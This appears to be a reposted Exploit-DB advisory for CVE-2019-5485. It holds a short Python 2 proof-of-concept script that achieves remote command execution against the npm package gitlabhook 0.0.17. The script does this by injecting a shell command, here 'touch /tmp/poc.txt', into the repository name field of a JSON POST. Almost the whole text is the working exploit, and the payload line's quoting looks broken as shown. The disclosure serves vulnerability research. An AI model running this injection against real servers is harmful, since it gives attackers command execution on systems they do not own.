Exploit/Advisories
Published on September 25th, 2019 📆 | 1794 Views ⚑
0NPMJS gitlabhook 0.0.17 – ‘repository’ Remote Command Execution
# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10.
# CVE : CVE-2019-5485
#!/usr/bin/python
import requests
target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"
json = '{"repository":{"name": "Diasporrra'; %s;'"}}'% cmd
r = requests.post(target, json)
print "Done."
https://www.exploit-db.com/exploits/47420
Gloss